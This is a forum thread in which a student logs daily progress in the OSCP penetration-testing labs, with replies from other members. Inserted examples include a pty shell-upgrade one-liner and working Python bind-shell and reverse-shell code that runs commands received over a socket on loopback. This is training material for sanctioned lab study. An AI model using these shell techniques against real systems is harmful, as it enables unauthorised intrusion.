Page 1 of 4
Results 1 to 25 of 82
  1. Member | Join Date: Jan 2016 | Posts: 56
    #1

    Starting OSCP - 31/1/16

    Hi guys, been lurking on this forum for a couple of weeks now. Got loads of help from some of the OSCP threads on here so thought I'd make my own.

    So my previous experience is mainly self-taught. I've done Sec+ and Net+ courses, but not the exams due to other factors. My self-taught skills lie in a broad spectrum: I enjoy RE and binary exploitation, pentesting, and a bit of forensics. I'd say my biggest weakness is web app hacking (going to spend the next few weeks getting up to scratch on this).

    Programming languages I'm confident with are C, Python (used mainly for CTFs), Java (for uni), and I can write pretty basic assembly from scratch (mainly for custom shellcode exploits).

    A few questions from people who've been there and done it:
    Did you guys take notes as you went through the course material (not the labs)? I'm a heavy note taker; I tend to write notes by hand, then type them up at the end of the week. Reckon that'll be doable?

    How prevalent in the labs was web-based hacking? It's (through my own fault) not my best area; obviously I look to improve on this.

    So that's pretty much me. I'm doing this mainly to learn; if I get a cert out of it at the end then it's just a bonus. Cheers for reading, I'll update this as and when I feel I should.

  3. Senior Member danny069 | Join Date: Nov 2012 | Location: NYC | Posts: 999
    Certifications: A+, Security+, ACMT, CASP, CEH, CCNA R&S, A.S. & B.S. Cyber Security Systems/Digital Forensics, M.S. Cyber Security
    #2
    I can't chime in on the OSCP, but to me, it's a man's man cert. Hands on and technical. Just wanted to say welcome and good luck!
    I am a Jack of all trades, Master of None

  4. Senior Member adrenaline19 | Join Date: Dec 2015 | Posts: 248
    #3
    I start in two days. Good luck to both of us!

  5. You have an error in your | Join Date: Jul 2014 | Location: Malta (EU) | Posts: 21
    Certifications: OSCP, Security+
    #4
    Quote Originally Posted by invictus_123 View Post
    How prevalent in the labs was web-based hacking? It's (through my own fault) not my best area; obviously I look to improve on this.
    I wouldn't worry about it. The course material will teach you most of what you need to know about web app attacks. With your existing knowledge, you'll need less time to get through the exploit development material than the average student, which will leave you with enough time for the web app part.

    Have a look at the OWASP Top 10 and read up on what you don't understand. Practice a bit with something like WebGoat, Damn Vulnerable Web Application, or a web app focused vulnerable VM.

  6. Member | Join Date: Jan 2016 | Posts: 56
    #5
    Quote Originally Posted by adrenaline19 View Post
    I start in two days. Good luck to both of us!
    Good luck

  7. Member | Join Date: Jan 2016 | Posts: 56
    #6
    Quote Originally Posted by Liindolade View Post
    I wouldn't worry about it. The course material will teach you most of what you need to know about web app attacks. With your existing knowledge, you'll need less time to get through the exploit development material than the average student, which will leave you with enough time for the web app part.

    Have a look at the OWASP Top 10 and read up on what you don't understand. Practice a bit with something like WebGoat, Damn Vulnerable Web Application, or a web app focused vulnerable VM.
    Cheers for the info!

  8. Member | Join Date: Jan 2016 | Posts: 56
    #7
    Day 1:
    So my pack arrived last night, but I didn't start till this morning. Checked out the first two chapters, found them a good refresher on bash command line stuff etc.

    I then decided to have a quick taster on the labs, I've decided that although I want to get the materials done first, I want to spend at least one evening a week in the lab so I'm not wasting the lab time.

    Anyways, I scanned the entire network and then picked a target, .205. Found quite a few vulnerable services, quick Google, found a Metasploit module for one, boom, system-level privileges. I don't feel bad for using Metasploit on my first day; as I'm quite comfortable with exploit development, I don't imagine finding it hard to copy and paste someone else's exploit.

    I guess I just really wanted to pop a shell on my first day to get rid of any nerves. I will be limiting my Metasploit usage from now on, however.

    So for now it's back to the PDF and videos. Day 1, 1 box rooted.

  9. Member | Join Date: Jan 2016 | Posts: 56
    #8
    Not sure if anyone is reading this, but I'm going to keep updating it every evening, mainly to clear my head.

    So Day 2:
    I spent a bit of time on the lab guide. Most of the first 2 chapters is a bit of a refresher for me as I'm familiar with the concepts, so I'm just taking notes and will watch the videos at the end of each section.
    I'm finding the materials very clear and well put together; looking forward to hitting some stuff I'm not aware of.

    The lab:
    So I went back into the lab in between lectures at uni and picked another box to hit. I've decided my process just isn't methodical enough yet, as I want to pwn everything straight away, and I end up going down some deep rabbit holes. This box was a clear example of that: I found a vulnerable service and stopped enumerating the other services. I got a low-priv shell and could grab files, but due to the privileges, I couldn't run any local exploits.

    After a while I decided to go back and do things properly, and hey presto, found a straight-to-root remote exploit. It was literally sitting right there all along. Lesson learnt. Rooted the box and will go back to pillage it tomorrow.

    Day 2 end, 2 systems rooted.

  10. Senior Member | Join Date: Nov 2012 | Location: Montreal | Posts: 588
    Certifications: OSCP, CEH, SSCP, EJPT, CCNA:Security, CCNA:R&S, MCSA:W2K8, Linux+, LPIC-1, SCLA
    #9
    Quote Originally Posted by invictus_123 View Post
    Not sure if anyone is reading this, but I'm going to keep updating it every evening, mainly to clear my head.
    I will be reading you daily. Keep it up!

  11. Junior Member Registered Member | Join Date: Feb 2016 | Location: Earth | Posts: 1
    Certifications: CISSP, VCP, MCSA
    #10
    Yes, please continue to update this thread.
    After I take the CISM I plan on tackling this exam and would love to have some recent feedback regarding the study process and exam.

  12. Senior Member | Join Date: Apr 2011 | Location: DMV | Posts: 212
    #11
    Trust me, a lot of people are following your progress, me included.

  13. Member | Join Date: Jan 2016 | Location: Malta | Posts: 52
    Certifications: A+, Net+, MCSE 2000, CCNA, eJPT, LPIC1, OSCP
    #12
    I think lots of people on here are interested and read every new post of every OSCP thread, myself included! They are such good reads.

  14. Member | Join Date: Jan 2016 | Posts: 56
    #13
    Cheers guys! I read every post I could find as well, and I found it really helpful.

    Day 3:
    I made a point of staying out of the labs as far as attacking machines goes today. I went back and properly looted the box from yesterday. So far the two boxes I've rooted aren't really talking to anyone; I don't have too much loot other than password files.

    The passwords seem to be pretty easy to crack, smashed 18/18 of them with the same wordlist, so that's nice.

    I'm on chapter 4 of the lab guide. So far, as I said before, it's all a bit of a refresher. If you're about to do this course, then I would definitely not get hung up on learning Metasploit or any tools. Go and learn the command line for Linux AND Windows. Learn about networking. The low-level stuff is important.

    Boring update, I'm afraid; I'll be far more active on the weekend.
    If anyone has any questions, whatever they may be, I'll do my best to answer them if I can.

  15. Achieve excellence daily | Join Date: May 2012 | Location: Washington State | Posts: 1,340
    Certifications: CISSP
    #14
    Thanks so much for this thread. I am starting in late March.
    When you go the extra mile, there's no traffic.

  16. Senior Member | Join Date: May 2006 | Posts: 1,863
    Certifications: CISSP, CCSP, eJPT, ITIL, PA ACE, Qualys Certified Specialist, A+
    #15
    Can you put the names of the boxes you are rooting or having problems with as you go along? A lot of people posting here do the same. Plus it gives us a sense of progression and a sense of difficulty when we read and can associate a machine with its name. It will help you remember stuff easier too if you track the machines by name instead of just "box". Keep updating, everyone reads this.

  17. Member | Join Date: Jan 2016 | Posts: 56
    #16
    Quote Originally Posted by TheFORCE View Post
    Can you put the names of the boxes you are rooting or having problems with as you go along? A lot of people posting here do the same. Plus it gives us a sense of progression and a sense of difficulty when we read and can associate a machine with its name. It will help you remember stuff easier too if you track the machines by name instead of just "box". Keep updating, everyone reads this.
    Yeh, of course. I'll try my best not to give any spoilers away. (It's only day 4 today and I'm focusing on the lab guide, so it's still at 2 boxes.)

    So far I've rooted mailMan (easy if you enumerate properly) and oracle (same as mailMan). I'm currently stuck on ghost: found the code and used it, but only getting "try harder" messages. Will crack on again at some point tomorrow.

  18. Member | Join Date: Sep 2015 | Posts: 83
    Certifications: Old School MCSE, NET+, CEH, CISSP, GICSP, OSCP and SCADA Specific goodness
    #17
    Ghost is not considered an easy box. You might give some thought to targeting some others first, purely from a psychological standpoint; of course, you seem better prepared than most.

  19. Senior Member MrAgent | Join Date: Oct 2010 | Location: Northern Virginia | Posts: 1,283
    Certifications: Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #18
    I didn't think Ghost was all that difficult. That was one of the first boxes I targeted, after Bob of course.
    Just pay attention to the material and you should be able to compromise it.
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/

  20. Member | Join Date: Sep 2015 | Posts: 83
    Certifications: Old School MCSE, NET+, CEH, CISSP, GICSP, OSCP and SCADA Specific goodness
    #19
    Some people have problems with it, but it's all relative to your experience.

  21. Member | Join Date: Jan 2016 | Posts: 56
    #20
    Quote Originally Posted by MrAgent View Post
    I didn't think Ghost was all that difficult. That was one of the first boxes I targeted, after Bob of course.
    Just pay attention to the material and you should be able to compromise it.
    I have enumerated it properly and have that code; I sort of understand what it does, but I'm not entirely sure how I can leverage it.

    Update Day 5:
    So last night I spent ages on freeBSD. I didn't get a shell, but I know how it's vulnerable, just not how to exploit it (yet). Really feel I've stepped up my enumeration: I checked everything, in depth, and understand what I may need to do.

    Tonight has also been a good one. I am halfway through chapter 4 in the lab guide, and in the last 4 hours I rooted kraken, redHat and Ralph. These were obviously low-hanging fruit, but I don't mind; I learnt a little bit from each box.

    A few things I've noticed so far:
    • If you're not sure where to start in the labs, check the forums; there's a page called "threads organised by lab machine". Use the logic that the easier systems will have fewer posts (worked for me tonight).
    • If you try to compile an exploit in C and you get a million errors, check the type of error (I'm pretty solid with C so I'm OK, but I can definitely see this putting people off if they don't understand it). So far, in almost every exploit I've had to compile, simply adding #include <stdlib.h> has corrected the errors.
    • I pinged an admin last night about freebsd, and he was reluctant at first when I asked about it, until I explained what I had done. As soon as they know you have properly enumerated the system, they will be more inclined to push you in the right direction. If you haven't run every tool you can think of, don't bother pinging them.
    Day 5, 5 systems rooted.

  22. Member | Join Date: Oct 2015 | Posts: 64
    #21
    I have 5 or so systems rooted. I've used Metasploit for all of them. I'm not sure how I feel about it. It feels cheap, but at the same time I think it makes sense, and the course says using Metasploit is fine. Do you think it's beneficial to download PoC code and alter it?

  23. Member | Join Date: Jan 2016 | Posts: 56
    #22
    Quote Originally Posted by Sch1sm View Post
    I have 5 or so systems rooted. I've used Metasploit for all of them. I'm not sure how I feel about it. It feels cheap, but at the same time I think it makes sense, and the course says using Metasploit is fine. Do you think it's beneficial to download PoC code and alter it?
    By all means use Metasploit, but just remember it is limited in the exam. My personal advice would be to attempt to redo as many as you can without Metasploit; it will really pay dividends if you know how to search for, compile and execute exploits.

    Update day 6:
    I managed to get a good bit of studying in on the lab guide, had a nice little refresher of nmap which I enjoyed. It's nice to get an expert view on security; like, I never really thought about how much traffic you're putting down the pipe when you portscan.

    So I don't know if I mentioned, but I had attempted ghost the other day and got about a third of the way there. Well, me and him went toe to toe tonight and I can proudly say I came out on top. I was on a bit of a roll and then got seriously stuck: I had the correct commands and had everything set up correctly, but the response I was getting was zilch, nada. I checked Wireshark and confirmed that something wasn't going how it should.

    This was the important part: before asking an admin for help, I checked every single possibility. It turns out that what I was missing was a gap in my knowledge about web servers and PHP. After I explained my predicament to an admin, he explained what was actually happening, which enabled me to change things around and boom, limited shell.

    The privilege escalation from here was a bit strange. I kind of stumbled onto an exploit after checking a certain file, and it took me ages to get it to work. Eventually I realised I was missing a step, and bang, root shell! Only took 5 hours.

    A quick pointer:
    • I am forever ending up with these crappy shells where you rarely get any stderr output (which is really important). This means, for example, if you wanna compile an exploit victim-side, you can't see any error messages.
    • You can use Python, for example, to jailbreak the crappy shell with this simple one-liner: python -c 'import pty;pty.spawn("/bin/bash")' - this made all the difference tonight.
    Will go back and loot the two boxes I haven't yet tomorrow (ralph and ghost). So that's it folks, day 6, 6 systems rooted.
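An added example (not code from the thread) of why that pty one-liner brings stderr back: the same command is run once through a plain pipe, standing in for a bare shell whose stdout is wired to your socket while its stderr still points wherever the parent process left it, and once under a pseudo-terminal, which is what pty.spawn gives an interactive shell. The test command, and the choice to discard stderr in the pipe case, are constructed for the demo; how stderr gets lost on a real target depends on how the shell was spawned.

```python
import os
import pty
import subprocess

# Constructed test command (not from the thread): one line to stdout, one to stderr.
CMD = ["sh", "-c", "echo stdout-line; echo stderr-line >&2"]


def run_through_pipe():
    """Model a bare shell: stdout flows back to us, stderr goes somewhere we
    cannot see (modelled here by discarding it). Compiler errors vanish."""
    proc = subprocess.run(CMD, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
    return proc.stdout.decode()


def run_through_pty():
    """Run the same command under a pseudo-terminal, as
    python -c 'import pty;pty.spawn("/bin/bash")' does for a shell.
    The child's stdin, stdout and stderr are all the pty slave, so everything
    it writes on either stream is readable from the master side."""
    pid, master_fd = pty.fork()
    if pid == 0:
        # Child: become the command, with the pty as its controlling terminal.
        try:
            os.execvp(CMD[0], CMD)
        finally:
            os._exit(127)
    chunks = []
    while True:
        try:
            data = os.read(master_fd, 1024)
        except OSError:
            # Linux raises EIO on the master once the slave side is closed.
            break
        if not data:
            # Other platforms signal end of output with an empty read.
            break
        chunks.append(data)
    os.close(master_fd)
    os.waitpid(pid, 0)
    # A tty turns "\n" into "\r\n" on output; normalise for comparison.
    return b"".join(chunks).decode().replace("\r\n", "\n")


if __name__ == "__main__":
    print("pipe:", repr(run_through_pipe()))   # stderr-line is missing
    print("pty: ", repr(run_through_pty()))    # both lines present
```

Unix only (the pty module does not exist on Windows). The pty also gives you job control and tab completion, which is the other reason the upgrade is worth doing before you start compiling things on the victim.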

  24. Member rudegeek | Join Date: Apr 2015 | Location: Denver | Posts: 69
    Certifications: GSEC, GCWN, CCNA R/S, Microsoft 70-410 MCP, Network +
    #23
    Good job bro! Keep pushing! Which machines have you pwnd so far?

  25. Member | Join Date: Jan 2016 | Posts: 56
    #24
    Quote Originally Posted by rudegeek View Post
    Good job bro! Keep pushing! Which machines have you pwnd so far?
    Cheers mate. Off the top of my head I have oracle, redhat, ghost, sipserver, kraken, mailman and ralph.

    Update day 7:
    Had a busy day with uni work, so I just typed my OSCP notes up and then spent a little time in the labs. I looted ghost, but I'll probably have to go back at some point and re-loot a lot of the machines, as I'm not too sure what to look for. I managed to root sipserver today as well; it must have been low-hanging fruit, as it only took about half an hour lol.

    I have also made some progress on jeff, which forced me to learn more web hacking (not my favourite thing), and I'm 90% of the way there with kevin, just got to modify an exploit, as I think kevin has his firewall up lol (it's important to understand the difference between a bind shell and a reverse shell).

    That's pretty much it today. I won't update tomorrow as I'm doing purely notes and not lab; gotta rest sometime!
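An added example (not from the thread) of the bind-versus-reverse distinction mentioned above: the same one-command "shell" is delivered both ways over loopback. In the bind case the target listens and the attacker connects in, which a host firewall that drops unsolicited inbound connections will block; in the reverse case the attacker listens and the target connects out, the direction such a firewall usually allows. The loopback addresses and ephemeral ports are assumptions for the demo, no firewall is simulated, and the "shell" only runs one command so the exchange stays readable.

```python
import socket
import subprocess
import threading

# Demo only: both "attacker" and "target" live on loopback (assumption for the example).
HOST = "127.0.0.1"


def _serve_one_command(conn):
    """The target side of either shell: read one command line, run it,
    send the output back, then hang up (a real shell would loop)."""
    reader = conn.makefile("r")
    cmd = reader.readline().strip()
    reader.close()  # release the file's reference so conn.close() really closes
    out = subprocess.run(cmd, shell=True, capture_output=True).stdout
    conn.sendall(out)
    conn.close()


def _drive(conn, cmd):
    """The attacker side of either shell: send a command, read until EOF."""
    conn.sendall(cmd.encode() + b"\n")
    return conn.makefile("rb").read()


def bind_shell_demo(cmd):
    """Bind shell: the TARGET listens on a port and the attacker connects
    INBOUND to it. Blocked if the target only permits outbound traffic."""
    target = socket.socket()
    target.bind((HOST, 0))
    target.listen(1)
    port = target.getsockname()[1]
    t = threading.Thread(target=lambda: _serve_one_command(target.accept()[0]))
    t.start()
    attacker = socket.create_connection((HOST, port))  # attacker -> target
    data = _drive(attacker, cmd)
    t.join()
    target.close()
    return data


def reverse_shell_demo(cmd):
    """Reverse shell: the ATTACKER listens and the target connects OUTBOUND
    to it. Survives an inbound-only firewall because egress is allowed."""
    attacker = socket.socket()
    attacker.bind((HOST, 0))
    attacker.listen(1)
    port = attacker.getsockname()[1]

    def target_side():
        _serve_one_command(socket.create_connection((HOST, port)))  # target -> attacker

    t = threading.Thread(target=target_side)
    t.start()
    conn, _ = attacker.accept()
    data = _drive(conn, cmd)
    t.join()
    attacker.close()
    return data


if __name__ == "__main__":
    print("bind:   ", bind_shell_demo("echo via-bind"))
    print("reverse:", reverse_shell_demo("echo via-reverse"))
```

In both functions the command executes on whichever side called `_serve_one_command`; the only thing that changes is who calls `connect()`, and that is exactly what a host firewall filtering on connection direction cares about.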

  26. Senior Member | Join Date: Oct 2014 | Location: Australia | Posts: 177
    Certifications: SSCP, CISSP, OSCP
    #25
    FREEBSD took me the longest so far, and in the end I'm sure I didn't do it the most elegant way possible.